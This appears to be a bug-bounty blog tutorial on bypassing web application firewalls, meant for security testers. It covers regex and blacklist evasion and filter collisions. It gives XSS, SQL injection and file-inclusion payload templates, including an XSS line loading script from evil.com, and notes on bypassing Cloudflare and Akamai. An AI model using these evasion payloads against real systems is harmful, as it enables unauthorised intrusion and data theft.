Web application firewall bypass

October 11, 2022

A web application firewall (WAF) is a program specially designed to filter, monitor and block malicious web requests related to its configurations.

The WAF filter and detection department is dependent on two primary configurations. The black/white list and a regex. These configurations make it possible for a WAF to determine if a request contains malicious content.

In this article, we will discuss different ways a WAF can be bypassed when a vulnerability has been discovered.
The topic will focus on how to take advantage of the configurations and normalisation that could affect the way a payload is being handled in the transport. We will show different scenarios and examples of manipulations that lead to a successful bypass.

Regex and list tampering

Regex stands for regular expression and is a method or sequence of characters to detect patterns inside its given content. In simple words, regex can be used to detect patterns from a source and makes a huge advantage when developing filter mechanisms for web application firewalls.

An example of how a regex could be used to find all words starting with the uppercase “Y“.

Regex

Y[a-zA-Z]+

String

Yes It's possible to hack on YesWeHack. You just need to sign up!

If you want to dig deeper and practice custom regex, you can do so here.

Let’s setup a simple filter that is intended to protect against onload statements which are used mainly in HTML and Javascript.

Regex

<.*on.*=.*>

Payloads

Did you notice anything?

The last payload looks almost identical to the first but it’s not detected by the regex. Why?
This is because the regex is not configured to detect patterns unless it ends with a > in this case. Imagine how precise the regex has to be to be able to detect a pattern.

This is one of the many examples how web application firewalls are being bypassed.

So, what happens if we just remove the > at the end of the regex and keep the anything .*?

Regex

<.*on.*=.*

Payloads

<img src=1%0aonerror=alert(1)

This is bypassable because we take advantage of two techniques. First, the regex looks for a payload that starts with < and secondly it looks for any onload statement followed by an equal sign =.
The last payload in the image takes advantage of the < symbol that the regex is searching for as a prefix. The payload splits into two pieces with the help of a newline \n.

The first payload piece starts with the < symbol and triggers the regex to start its pattern search. Then, when we add the newline to the payload, the regex is broken. The regex breaks because the .* checks for anything except newlines. This makes the payload undetectable.

Lastly, we add our final piece to the payload that includes the onerror=alert(1) part. The regex won’t detect the onerror statement since it’s not starting with the < symbol, which is needed to trigger the regex. It results in a successful bypass.

A WAF also uses different word lists to detect payloads by searching for words inside the request. If it detects a word within the given blacklist in the request, the request will be blocked by the WAF. The opposite type of list is the whitelist. This word list contains words which are allowed to be used or that are strictly needed within an input.

Let’s upgrade the regex filter and add all previous bypass methods to fix bypasses related to newlines.

Regex

.*on(.*|n)=(.*|\n)

The .*|\n simply means (anything or newlines)

Blacklist

alert
confirm
prompt
iframe
script
style
base

Payloads

The regex didn’t detect <imgsrc=1 but detected the onerror=alert(1) part at the second last payload. This results in a WAF block but in a real world scenario you would have gotten a forbidden/block page without being aware of the fact that half of your payload was successful.

That’s a reason why it’s very important to take one step at a time when crafting a payload (more on that later).

So how did the latest payload bypass the regex?

This is because we have configured the regex to detect anything OR newlines on(.*|\n)= and not both of them combined.

Valid

on
=.*

or

on.*=

Invalid

on
NotAnEqualSignAfter=

I think you get the point. It is very difficult to configure a firewall to detect all kinds of patterns. Because the payload is so extremely flexible, the payload is always one step ahead.

Firewall and frontend/backend filter

It’s important not to mix up firewall filters with frontend and backend filters. You might be able to bypass the firewall but that doesn’t mean you actually found a vulnerability within the system itself. Remember that the firewalls purpose is to have an extra protection and detection for malicious requests.
If the frontend and/or backend do not filter/escape properly, this would likely instead be a vulnerability. This isn’t the case if it’s within the web application firewall filters since the firewall do not protect an actual input handler.

A good example would be the following:

Firewall filter

<.*on=.*=.*
<img src='1' onerror='alert(1)'>

Scenario 1. Payload blocked: Request blocked
Scenario 2. Payload bypassed: WAF transfer the request to the backend code

Output

<p>no result for: <b><img src='1' onerror='alert(1)'></b></p>

Status: Web application firewall bypass and vulnerability exploited. Resulting in Cross-Site scripting (XSS).

In this case, the firewall was bypassed and the backend was vulnerable to an XSS injection because it didn’t escape the actual user input handling for dangerous chars.

If the backend were to escape the search GET parameter ($input variable), the result would be that the WAF was bypassed but the input itself was not vulnerable to XSS.

Example

Backend programming language PHP – htmlspecialchars()

Output:

<p>No result for: <b>&lt;img src=&#039;1&#039; onerror=&#039;alert(1)&#039;&gt;</b></p>

Status: Web application firewall bypassed but search parameter wasn't vulnerable.

When trying to bypass a WAF, it is very important to first determine how the frontend/backend filter works before attempting to exploit it. If the entrance is not vulnerable, what is the point of bypassing the firewall?

Normalisation and filter collision

In many cases, frontend, backend and/or technologies such as proxies cause not only normalisation but also filter collisions. A filter collision occurs when there are two or more filters that have a similar task in common.

Example of a simple collision

Image that we use a payload as following: ywh"

  1. The browser will URL encode the char " and then transfer it to the web application firewall.
Payload → ywh%22
  1. The WAF sees no suspected content and the payload continues to the frontend.
  2. The Javascript that runs on the frontend decodes the payload and escape it with a backslash.
Payload → ywh\"

5. The backend deletes all quotes in the input to avoid quotes altogether. (Collides with frontend filter)

Payload → ywh\

6. When the payload reflects in the frontend response, it will appear as ywh

The end results. You are now able to take advantage of this collision for a lot of different payloads. Since the quotes are deleted and leave the \ alone, you could use them to bypass URL verification or escape backslash itself with \\" that will result in \\ .

Take advantage of all the different behaviours of the target when bypassing the web application firewall.

Example custom payloads related to the collision

SSRF → http:""localhost
XSS (that includes links etc) → src='""://evil.com/xss.js'

Payload preparation

The main challenge when trying to adapt a bypassable payload is to determine how the payload is understood by the web application firewall. Since a WAF only responds with a forbidden page or lets the payload pass, we need to take small steps forward to build up a payload.

The payload should contain only the characters that are necessary for the type of vulnerability you are trying to exploit. This will provide a better understanding of how the payload is managed and changes during the process.
There are lots of different ways to customise a payload. Besides, depending on the vulnerability, there are different characters that are particularly important to include for a successful payload.

Example: (Not limited to)

  • SQL injections: ', ", \, (, )
  • Cross-site Scripting: ', ",`, \, <, >
  • Template Injection: $, #, %, {, }
  • PHP code injection: ?, <, >, ;
  • Local file include: ., /, \, :

There is no need to use onload if the firewall does not protect against the HTML tag <script> and there is no need to use the symbols < or > if we infect within an HTML tag.
The same goes for SQL injection, Template injection or other types of vulnerabilities that need a payload to be exploited properly. Create and adapt a payload from the location where it is placed.

There are some good payloads out there, but if you want to be able to bypass WAFs at an advanced level, most of these payloads are not the solution. However, taking notes from them and storing template payloads are good strategies.

Consider a simple payload as follows:

<script>

The payload itself do not exploit anything. The first step is actually getting blocked. It may sound strange, but it’s the first step in creating a payload that can bypass the WAF. The only situation where this technique can be bad is if the firewall blocks you permanently. In these cases, you can use proxies that allow you to change IP addresses frequently. Tor can be useful in these situations.

Most WAFs block this payload directly because it contains the HTML tag <script>, which is often used in XSS payloads. If this would have been a SQL injection, the payload: ' or 1=1 -- - would have been a good choice to use since it is obvious that it will be blocked.

So why do we want a blocked payload?

It’s because it’s not possible to adapt a payload to bypass a WAF without the knowledge on how the WAF sees the input. The fact that common payloads are a good core is because they provide an opportunity to get a direct feedback from the firewall. This will be used to easier do a reconnaissance of the firewall configurations. Most of the time, the firewall will be even stricter because we trigger more filter departments.

Payload: <script>
<, >   -> are probably within the regex pattern
script -> Is probably inside the blacklist

To continue the process, we will now start adjusting the payload until we have got the information we need. For each time the payload gets blocked/valid, you get more feedback on how you can adjust your payload to bypass the WAF.
If the firewall only blocks the request but not the host it came from, it’s possible to automate some parts.

Example of some automated process could be:

  • Fuzzing for HTML tags and chars
  • Encoding mechanism that can work to bypass the firewall

Example of a WAF reconnaissance process

Using the steps in the <script> payload, we now have an understanding of how WAF filters its input data. We successfully managed to collect working tampers that we can work with to build a fully functional payload that will bypass the firewall.

Payload templates

These are core templates and there are lots of different types that you can use and create yourself. Always use the characters and combinations that give the best feedback from the web application firewall.

Cross-Site scripting

<script>
<svg>
<iframe>
<base>
<img onx=1

//Can later be tested with:

'0"><x
<1337onx=1>
</x>
"<x>"
<x"0'x

SQL injection

' or 1=1 -- x
\'or+1=''
' x 1=1
sleep(4)
'||1
' select x

//Can later be tested with:

or/**/and/**/
' x=1
x')or('x

Local file inclusion

/etc/passwd
file://etc/passwd
xyz://etc/passwd
etc///passwd
\..\..\x
..;/..;/
x../../x
../

//Can later be tested with:
\/..\/\/..\/x
../..
1337../
../..x.png
./././
.:./.:./
.%00./x.php

Methodology

The methodology covers the different paths from when a vulnerability is detected but blocked by the web application firewall, which prevents the payload from successfully exploiting the vulnerability.

Input Recon

Analyse the types of chars that can be used in the payload.

Normalisation


Detect if there is any normalisation accure related to the technology used by the target that may affect the transport of the payload and/or its content to be modified.

Frontend/Backend filter


Determine how the frontend and/or backend filters adjust the payload and then use that against the web application firewall (Delete, Replace, Append, Add chars etc…).

Collisions


Look for collisions between frontend and backend filters (if any). This is rare, but in some vulnerabilities it is possible to take advantage of the vulnerable input behavior to bypass the web application firewall as well.

Regex


For each time, add a new piece to your payload to detect the firewall regex.

Black and white lists


Once the basic knowledge of the WAF regex is known, add possible strings to the white/black list of the payload to analyse in which areas it can and cannot be used.

Payload preparation


Analyse the results of the different payloads used. Use this technique to adjust and update the next payload that will be used.

Firewall weaknesses

This is based on successful techniques that have repeatedly managed to bypass the same firewall for web applications in different companies.

CloudFlare

  • Newlines that split the payload
  • Overload of parentheses (sleep((3)))
  • Payloads do) not include spaces 'or-'1
  • Weak blacklist
  • Base64 encode

Akamai

  • Newlines that split the payload
  • Math to set or compare values (2-10/2)
  • Multi-line comment with backslashes manipulation /*\/*\/*/
  • Double URL encoding %2522
  • Base64 encode
  • Early discovered > or &gt; <img/&gt;/onload=...
  • Space before parentheses/backtricks payload(1), payload `1`
  • Payloads do not include spaces 'or-'1

Airlock

When payloads are presented inside quotes. "alert(1)"

START HUNTING!🎯